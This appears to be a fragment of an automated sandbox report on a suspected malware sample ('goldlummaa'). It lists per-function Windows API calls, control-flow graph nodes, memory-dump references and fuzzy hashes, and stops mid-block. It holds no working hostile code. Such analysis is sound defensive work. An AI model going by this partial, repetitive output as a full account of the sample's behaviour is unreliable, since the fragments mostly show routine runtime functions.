                                                                                                                  • API ID: FileHandleType
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3000768030-0
                                                                                                                  • Opcode ID: 8e55ae55c433639c9f05d972386665a23658ab3b82938cc8b4659b28294930c4
                                                                                                                  • Instruction ID: a5aa85190557f588a44226f6bf37cccd1ccb6eb842b8d02ebaa7ed96f7b62c9b
                                                                                                                  • Opcode Fuzzy Hash: 8e55ae55c433639c9f05d972386665a23658ab3b82938cc8b4659b28294930c4
                                                                                                                  • Instruction Fuzzy Hash: 1E11B13150874146C7308E7E8CC8726BA9CEB56330B39075AE2B7C65F2C735DA86D646

                                                                                                                  Control-flow Graph

                                                                                                                  APIs
                                                                                                                  • GetLastError.KERNEL32(00C78D78,0000000C), ref: 00C6691F
                                                                                                                  • ExitThread.KERNEL32 ref: 00C66926
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorExitLastThread
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1611280651-0
                                                                                                                  • Opcode ID: 89cc13a4bfcf783a9619235a7833ac25b9d1770f9ac52226aef6f9b5602652ab
                                                                                                                  • Instruction ID: a56074287c7b65936f7725d3f7433f05bbc6e5aee52bd63571a7d3bfa7c5a14f
                                                                                                                  • Opcode Fuzzy Hash: 89cc13a4bfcf783a9619235a7833ac25b9d1770f9ac52226aef6f9b5602652ab
                                                                                                                  • Instruction Fuzzy Hash: C7F0C2709442059FDB20AFB0C98AB6E3B78FF44310F204199F516972A2CB309941DB90

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 284 c69357-c69366 call c69652 287 c6938f-c693a9 call c693b4 LCMapStringW 284->287 288 c69368-c6938d LCMapStringEx 284->288 292 c693af-c693b1 287->292 288->292
                                                                                                                  APIs
                                                                                                                  • LCMapStringEx.KERNELBASE(?,00C6D615,?,?,-00000008,?,00000000,00000000,00000000,00000000,00000000), ref: 00C6938B
                                                                                                                  • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,-00000008,-00000008,?,00C6D615,?,?,-00000008,?,00000000), ref: 00C693A9
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2568140703-0
                                                                                                                  • Opcode ID: dd93ec988a6e0fb53e9c7c13953bf0a7022d1364e70106de876897dbd676cd87
                                                                                                                  • Instruction ID: 33d43793dcf0f5fd0a4d5b1ddd3ea655845ecadfd0e4f327e128a1a03e5feaf8
                                                                                                                  • Opcode Fuzzy Hash: dd93ec988a6e0fb53e9c7c13953bf0a7022d1364e70106de876897dbd676cd87
                                                                                                                  • Instruction Fuzzy Hash: 98F0283240011ABBCF225F91DC45ADE7E6AFF58760F054120FA2965170CA36C971AB90

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 293 c6a83b-c6a844 294 c6a846-c6a859 RtlFreeHeap 293->294 295 c6a873-c6a874 293->295 294->295 296 c6a85b-c6a872 GetLastError call c6af10 call c6aec7 294->296 296->295
                                                                                                                  APIs
                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,?,00C6B3A9,?,00000000,?,?,00C6B2C5,?,00000007,?,?,00C6B8DE,?,?), ref: 00C6A851
                                                                                                                  • GetLastError.KERNEL32(?,?,00C6B3A9,?,00000000,?,?,00C6B2C5,?,00000007,?,?,00C6B8DE,?,?), ref: 00C6A85C
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ErrorFreeHeapLast
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 485612231-0
                                                                                                                  • Opcode ID: e678d4a6a9fdd0b85a4b8abe5dfbb76f0513094f1b0e85067ed5cc746ce0cd41
                                                                                                                  • Instruction ID: 3f9e57e8de5928e780eefcaa08bde855ba0869d633f019549c35b7efa22c93e5
                                                                                                                  • Opcode Fuzzy Hash: e678d4a6a9fdd0b85a4b8abe5dfbb76f0513094f1b0e85067ed5cc746ce0cd41
                                                                                                                  • Instruction Fuzzy Hash: 0CE08C32140204ABCB212FE0EC4DB9D7A68EB44351F004021F71CA70A0CA70CEA4CB8B

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 301 c6a649-c6a66b 302 c6a671-c6a683 GetCPInfo 301->302 303 c6a77d-c6a7a3 301->303 302->303 305 c6a689-c6a690 302->305 304 c6a7a8-c6a7ad 303->304 306 c6a7b7-c6a7bd 304->306 307 c6a7af-c6a7b5 304->307 308 c6a692-c6a69c 305->308 310 c6a7bf-c6a7c2 306->310 311 c6a7c9 306->311 309 c6a7c5-c6a7c7 307->309 308->308 312 c6a69e-c6a6b1 308->312 313 c6a7cb-c6a7dd 309->313 310->309 311->313 314 c6a6d2-c6a6d4 312->314 313->304 317 c6a7df-c6a7ed call c63c8e 313->317 315 c6a6d6-c6a70d call c6b45d call c6d4dc 314->315 316 c6a6b3-c6a6ba 314->316 327 c6a712-c6a740 call c6d4dc 315->327 320 c6a6c9-c6a6cb 316->320 323 c6a6bc-c6a6be 320->323 324 c6a6cd-c6a6d0 320->324 323->324 326 c6a6c0-c6a6c8 323->326 324->314 326->320 330 c6a742-c6a74d 327->330 331 c6a74f-c6a759 330->331 332 c6a75b-c6a75e 330->332 333 c6a76e-c6a779 331->333 334 c6a760-c6a76a 332->334 335 c6a76c 332->335 333->330 336 c6a77b 333->336 334->333 335->333 336->317
                                                                                                                  APIs
                                                                                                                  • GetCPInfo.KERNEL32(00000083,?,00000005,00C6A4CA,?), ref: 00C6A67B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Info
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1807457897-0
                                                                                                                  • Opcode ID: 874f639a6943252c90ec47a9a931054ca21656c4a4705159b91acf57c53aa655
                                                                                                                  • Instruction ID: 98a05fad8caa29cd28c9005d126e8b8a91085f7a45edbcdb5d941c6e31f30c89
                                                                                                                  • Opcode Fuzzy Hash: 874f639a6943252c90ec47a9a931054ca21656c4a4705159b91acf57c53aa655
                                                                                                                  • Instruction Fuzzy Hash: 1C5149B1904158AEDB218E29CDC4BF9BBBCEF15304F1401E9E49AE7182D335AE85DF61

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 337 c632d0-c63374 call c63400 call c635a0 call c667f4 344 c63379-c6338d 337->344 346 c63393-c6339b call c635c0 344->346 347 c633a0-c633b8 call c63e7f 344->347 352 c633bd-c633d5 call c63610 346->352 347->352
                                                                                                                  APIs
                                                                                                                  • std::_Throw_Cpp_error.LIBCPMT ref: 00C633B3
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Cpp_errorThrow_std::_
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2134207285-0
                                                                                                                  • Opcode ID: 66afed5032cb847219c6d62e57d970b0aa3c0db3bd24bcb3dde621d03a6cb893
                                                                                                                  • Instruction ID: 95c5fe07794aed4a3b455cc76fd55cbcaf1fb1b3e56e57c32c78cc058a84cdd3
                                                                                                                  • Opcode Fuzzy Hash: 66afed5032cb847219c6d62e57d970b0aa3c0db3bd24bcb3dde621d03a6cb893
                                                                                                                  • Instruction Fuzzy Hash: 2331C5B5901248CFCB14DFA9C585BAEBBF0FF48314F10816AE815AB361D7759A05CFA1

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 355 c69599-c695c3 356 c695c5-c695c7 355->356 357 c695c9-c695cb 355->357 358 c6961a-c6961d 356->358 359 c695d1-c695d8 call c694ce 357->359 360 c695cd-c695cf 357->360 362 c695dd-c695e1 359->362 360->358 363 c695e3-c695f1 GetProcAddress 362->363 364 c69600-c69617 362->364 363->364 365 c695f3-c695fe call c665f7 363->365 366 c69619 364->366 365->366 366->358
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID:
                                                                                                                  • String ID:
                                                                                                                  • API String ID:
                                                                                                                  • Opcode ID: 88c2d79b497a8e76fdb812692ddb1bad94e16166df500ee24726cab211f2c139
                                                                                                                  • Instruction ID: 0f1c780dfe7722d46f191b584f7f5e2b99fce616ec6491b909ca7560185bfb3b
                                                                                                                  • Opcode Fuzzy Hash: 88c2d79b497a8e76fdb812692ddb1bad94e16166df500ee24726cab211f2c139
                                                                                                                  • Instruction Fuzzy Hash: A0019E732046159B9B269E6EECC1B2E33A9FBC13207294125F9198B194DA30D9849695

                                                                                                                  Control-flow Graph

                                                                                                                  • Executed
                                                                                                                  • Not Executed
                                                                                                                  control_flow_graph 369 c6b3b5-c6b3c1 370 c6b3f3-c6b3fe call c6aec7 369->370 371 c6b3c3-c6b3c5 369->371 378 c6b400-c6b402 370->378 373 c6b3c7-c6b3c8 371->373 374 c6b3de-c6b3ef RtlAllocateHeap 371->374 373->374 375 c6b3f1 374->375 376 c6b3ca-c6b3d1 call c67d70 374->376 375->378 376->370 381 c6b3d3-c6b3dc call c66d13 376->381 381->370 381->374
                                                                                                                  APIs
                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00C63C34,?,?,00C62442,00001000,?,00C623AA), ref: 00C6B3E7
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AllocateHeap
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1279760036-0
                                                                                                                  • Opcode ID: 1911266c64a81d1b2dc78939f59394ec0d3feb4c1adf51b25d2266006014d939
                                                                                                                  • Instruction ID: 16288e36bff457c519bc831a252c44c7bf05ea9bd0918f8e0d69d8cae21eead8
                                                                                                                  • Opcode Fuzzy Hash: 1911266c64a81d1b2dc78939f59394ec0d3feb4c1adf51b25d2266006014d939
                                                                                                                  • Instruction Fuzzy Hash: 8EE06D31345625A7DB312B779C85B6ABA8CEF413A0F150130AD65E63E0DFA4DE8091F2
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExitProcess
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 621844428-0
                                                                                                                  • Opcode ID: 7d28a5908a9373c5db7761fde110b94891e263c4e2f516634d719a86ff7af1be
                                                                                                                  • Instruction ID: 3ae8308502bb3cd4b8bd297261dfbf6c096dc0a8ecf92bda01d0a6e6b17a0edd
                                                                                                                  • Opcode Fuzzy Hash: 7d28a5908a9373c5db7761fde110b94891e263c4e2f516634d719a86ff7af1be
                                                                                                                  • Instruction Fuzzy Hash: 0AE012716152089BD740EF79CC1579E7BE5EF49351F45C438E98DDB344DA34E8808792
                                                                                                                  APIs
                                                                                                                  • FindFirstFileExW.KERNEL32(?,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C6C03B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileFindFirst
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1974802433-0
                                                                                                                  • Opcode ID: 6f82fffb03496b2a28847bd8f8f762fd8548d9994ae496034cf4f2d04aba076e
                                                                                                                  • Instruction ID: 32d7f3d584145d55f497afef2134fa98db052c4f1e0f86b337cf88ddd0a7a708
                                                                                                                  • Opcode Fuzzy Hash: 6f82fffb03496b2a28847bd8f8f762fd8548d9994ae496034cf4f2d04aba076e
                                                                                                                  • Instruction Fuzzy Hash: 4471D1B5905128AFDF30AF68CCC9ABEB7B8AB05300F1441D9E058E7252EB314EC59F11
                                                                                                                  APIs
                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 00C65033
                                                                                                                  • IsDebuggerPresent.KERNEL32 ref: 00C650FF
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00C65118
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(?), ref: 00C65122
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 254469556-0
                                                                                                                  • Opcode ID: be03748d270d4c85e64a4bb8f1afd28ec798b82250d5d073f61f986636b1307f
                                                                                                                  • Instruction ID: 2a1c59e72245fffbd21885f4ccb2ffdf4baf5f9aff0982ca9a9f2590486e9e88
                                                                                                                  • Opcode Fuzzy Hash: be03748d270d4c85e64a4bb8f1afd28ec798b82250d5d073f61f986636b1307f
                                                                                                                  • Instruction Fuzzy Hash: 2931D575D05219DBDF21DFA4D9897CDBBB8BF08300F1041AAE50DAB250EB719B889F45
                                                                                                                  APIs
                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00C679C4
                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00C679CE
                                                                                                                  • UnhandledExceptionFilter.KERNEL32(-00000327,?,?,?,?,?,00000000), ref: 00C679DB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3906539128-0
                                                                                                                  • Opcode ID: d4540d8f56d5b91cc82b2662fd78c073fe5f4e1063e68c6725e78715424576c9
                                                                                                                  • Instruction ID: 3b7195efbcc7e5c1298872219f2dd4c2864e52460f0c37e75d9c6da8227f9be6
                                                                                                                  • Opcode Fuzzy Hash: d4540d8f56d5b91cc82b2662fd78c073fe5f4e1063e68c6725e78715424576c9
                                                                                                                  • Instruction Fuzzy Hash: 4031E67490121D9BCB61DF64DD89B8DBBB4BF08310F5042EAE41CA7260EB749F858F45
                                                                                                                  APIs
                                                                                                                  • GetSystemTimePreciseAsFileTime.KERNEL32(?,00C64844,?,?,?,?,00C64868,000000FF,?,?,?,00C64780,00000000), ref: 00C6490B
                                                                                                                  • GetSystemTimeAsFileTime.KERNEL32(?,50496CFE,?,?,00C71B3D,000000FF,?,00C64844,?,?,?,?,00C64868,000000FF,?), ref: 00C6490F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Time$FileSystem$Precise
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 743729956-0
                                                                                                                  • Opcode ID: 5d6a679ef80248dcf9ee7a67fa09cb84a9c8d619b4b025f9f7a0bef1ee52427d
                                                                                                                  • Instruction ID: d6b638476ca0f00bc5f0a7833318f6c742dc5f35426e267cb20f925e8909ac69
                                                                                                                  • Opcode Fuzzy Hash: 5d6a679ef80248dcf9ee7a67fa09cb84a9c8d619b4b025f9f7a0bef1ee52427d
                                                                                                                  • Instruction Fuzzy Hash: B4F02B72948598EFCB119F04DC40F5EB7ACFB08F20F00422AEC2693390DB34A9448BC0
                                                                                                                  APIs
                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00C7149D,?,?,00000008,?,?,00C7106F,00000000), ref: 00C7176F
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_c60000_goldlummaa.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ExceptionRaise
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3997070919-0
                                                                                                                  • Opcode ID: 11db0afad4db0a289cf0650d6c9b6f58d63919e3945f65ef2ef1494b8414fd2d
                                                                                                                  • Instruction ID: e181b01a5207ce34e386b14f843ce7793f69f85655d29ed61d30e1a3c8e766b0
                                                                                                                  • Opcode Fuzzy Hash: 11db0afad4db0a289cf0650d6c9b6f58d63919e3945f65ef2ef1494b8414fd2d
                                                                                                                  • Instruction Fuzzy Hash: 2EB11C356106099FD719CF2CC48AB657BE0FF45365F29C658E8AACF2A1C335DA91CB40
                                                                                                                  APIs
                                                                                                                  • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 00C6524B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1376983453.0000000000C61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00C60000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1376966491.0000000000C60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1376999743.0000000000C72000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377013660.0000000000C7A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377051161.0000000000C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377065117.0000000000C7D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1377079658.0000000000C80000.00000008.00000001.01000000.00000003.sdmpDownload File
